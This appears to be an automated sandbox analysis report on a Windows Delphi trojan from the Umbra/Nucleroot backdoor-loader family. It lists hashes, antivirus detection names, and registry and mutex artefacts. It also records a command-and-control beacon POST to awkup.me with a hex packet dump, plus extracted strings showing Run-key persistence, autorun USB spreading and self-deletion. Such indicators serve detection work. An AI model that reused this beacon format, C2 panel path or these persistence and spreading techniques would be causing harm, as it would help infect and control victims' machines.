Analysis Date: 2015-02-24 08:57:43
MD5: a4f92f2780610d712cf51f33fca27ab5
SHA1: bda6c3941b62804fc3793699e3c118189003c836

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6038e45d651757875aa6b07ed86976e2 sha1: dd00e3196288e920b192926598bcda50dfe6a672 size: 41472
Section.itext md5: a69127388ed383cdf3b1d485bbdb26c7 sha1: 0a9c0c1389502edb629a601444e2a4bc7db67d85 size: 512
Section.data md5: 02cda8943676a0fd3e13cfe908fab1e1 sha1: da3a50a6aeb0a91fc9f3132d3c2ebaa7f15c72b2 size: 3584
Section.bss md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 2d1d3ffa7e1d5e9dba6be0e3e6f9524e sha1: 62e840587457737d5e0cfb8eecd6a150e4d3d13f size: 3072
Section.didata md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: 3d306159009b4fa0aa7915d2b3ea1bf0 sha1: e001ed6794f1c406df37c0ba8871702f76425830 size: 512
Section.reloc md5: 5e62f413a9f2cf81defc56c10a73026a sha1: 5bc5f551ff891b5af6447f0331c26a6e63661cff size: 5120
Section.rsrc md5: d8cd30fe5dc208f0b8197efece518665 sha1: 2acae7baab16d2f25de8d4945bc78bf706e94b6a size: 36352
Timestamp: 2012-07-14 12:11:05
Packer: BobSoft Mini Delphi -> BoB / BobSoft
PEhash: 4e9ffcef24834fd550f0209bbd98454c6eddef75
IMPhash: 4eb9d67d7eb64a8b56e4c4b754e56925
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Graftor.127004
AV Alwil (avast): Malware-gen:Delf-SFQ [Trj]:Win32:Malware-gen
AV Arcabit (arcavir): Gen:Variant.Graftor.127004:Worm.Generic.380883
AV Authentium: no_virus
AV Avira (antivir): TR/ATRAPS.Gen
AV BullGuard: Gen:Variant.Graftor.127004
AV CA (E-Trust Ino): Win32/Tnega.ANRR
AV CAT (quickheal): Backdoor.Nucleroot.ks
AV ClamAV: WIN.Trojan.Nucleroot-1
AV Dr. Web: BackDoor.Umbra.17
AV Emsisoft: Gen:Variant.Graftor.127004
AV Eset (nod32): Win32/Delf.OGJ
AV Fortinet: W32/Delf.OGJ!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Variant.Graftor.127004
AV Grisoft (avg): Delf.AGLM
AV Ikarus: Backdoor.Win32.Nucleroot
AV K7: Trojan ( 7000000f1 )
AV Kaspersky: Backdoor.Win32.Nucleroot.ks
AV MalwareBytes: Trojan.Delf
AV Mcafee: W32/Generic.Delphi.b
AV Microsoft Security Essentials: TrojanDownloader:Win32/Umbald.A
AV MicroWorld (escan): Gen:Variant.Graftor.127004
AV Rising: Trojan.Agent!4F69
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: TROJ_UMBALD.AC
AV VirusBlokAda (vba32): Backdoor.Nucleroot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\slayer616wasd\UID ➝ {CE4032B9-95D9-48D4-AAD4-BA1B0AA5192C}
Creates Mutex: DBWinMutex
Creates Mutex: slayer616wasd

Network Details:

DNS: awkup.me
Type: A
46.30.212.66
HTTP POST: http://awkup.me/Panel/Panel/bot.php
User-Agent: umbra

Raw Pcap
0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0


Strings
1.2.0
a1b2c3
[autorun]
:\autorun.inf
BILGE:TONYUKUK:BEN:
&cmdid=
del "
del "melt.bat"
DLL0
DVCLAL
hermalit
http://
HTTP/1.0
jjjj
kernel32.dll
K:ERTI
localhost/Panel/Panel/bot.php|localhost/Panel/Panel/bot.php|www.google.de/Panel/Panel/bot.php
melt.bat
mode=1&UID=
mode=2&UID=
mode=3&UID=
M:TABGAC:ILINGE:KILINDIM:T
open=
PACKAGEINFO
ping -n 1 localhost
POST
RK:BODUNU:TABGACKA:K
SOFTWARE\Microsoft\
Software\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
:start
starter.exe
\UID
umbra
UMBRALOADER1235
USB Spreading
&version=
Windows Updater
winsvchost.exe
0123456789ABCDEF
0123456789ABCDEF$A@
2prjLoader_XE2
advapi32.dll
AnsiString
An unexpected memory leak has occurred. 
B.rsrc
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
BTMemoryGetProcAddress: name <-> ordinal number don't match
BTMemoryGetProcAddress: no export table found
 BTMemoryLoadLibary: BuildImportTable failed
BTMemoryLoadLibary: Can't attach library
BTMemoryLoadLibary: dll dos header is not valid
BTMemoryLoadLibary: Get DLLEntyPoint failed
BTMemoryLoadLibary: IMAGE_NT_SIGNATURE is not valid
BTMemoryLoadLibary: VirtualAlloc failed
BTMemoryModule
BuildImportTable: can't load library: 
BuildImportTable: GetProcAddress failed
BuildImportTable: ReallocMemory failed
 bytes: 
Cardinal
CloseHandle
CoCreateGuid
Content-Type: application/x-www-form-urlencoded
CopyFileW
CoTaskMemFree
CreateFileW
CreateMutexW
CreateThread
`.data
DeleteCriticalSection
.didata
dwError
.edata
example.dll
ExitProcess
FastMM Embarcadero Edition (c) 2004 - 2011 Pierre le Riche
FinalizeSections: VirtualProtect failed
FindClose
FindFirstFileW
FindResourceW
FreeLibrary
GetACP
GetCommandLineW
GetComputerNameW
GetCurrentThreadId
GetDriveTypeW
GetLastError
GetLocalTime
GetModuleFileNameW
GetModuleHandleW
GetPluginInfo
GetProcAddress
GetProcessHeap
GetStartupInfoW
GetStdHandle
GetSystemInfo
GetThreadPreferredUILanguages
GetThreadUILanguage
GetVersion
GetVersionExW
GetWindowsDirectoryW
HeapAlloc
HeapFree
HttpOpenRequestW
HttpSendRequestA
.idata
InitializeCriticalSection
InternetCloseHandle
InternetConnectW
InternetOpenUrlW
InternetOpenW
InternetQueryDataAvailable
InternetReadFile
IsBadReadPtr
`.itext
kernel32.dll
loader
LoadLibraryA
LoadResource
LocalAlloc
LocalFree
LockResource
<l?o>n
lstrlenW
MessageBoxA
MultiByteToWideChar
ole32.dll
oleaut32.dll
OutputDebugStringW
PluginStart
RaiseException
.rdata
RegCloseKey
RegCreateKeyW
RegDeleteValueW
RegNotifyChangeKeyValue
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
@.reloc
RtlUnwind
Runtime error     at 00000000
SetFileAttributesW
SetThreadLocale
SetThreadPreferredUILanguages
shell32.dll
ShellExecuteW
SHFolder.dll
SHGetFolderPathW
SizeofResource
string
StringFromCLSID
	strResult
SVWRPj
SysFreeString
SysInit
SysReAllocStringLen
System
System.Types
System.Types	untParser
System.UITypes
TerminateThread
The sizes of unexpected leaked medium and large blocks are: 
The unexpected small block leaks are:
This program must be run under Win32
THTTPResult
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tNh,M@
	TStrArray
u5hXk@
Unexpected Memory Leak
UnhandledExceptionFilter
UnicodeString
Unknown
untInstallation
untMD5
>untMD5
untParser
untPlugins
 untPlugins
untRegistry
untSettings
untUtils
user32.dll
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
VWUUhl2@
VWUUhP4@
WideCharToMultiByte
Winapi.IpExport
Winapi.Qos
Winapi.ShellAPI
Winapi.SHFolder
Winapi.Windows
Winapi.WinInet
Winapi.Winsock2
wininet.dll
WriteFile
yuntUtils
_^[YY]
;Z]_^[
Zdcibz~-X}ilyh
zdc~{neb~y#huh
;<;zl~i
Z_^[XX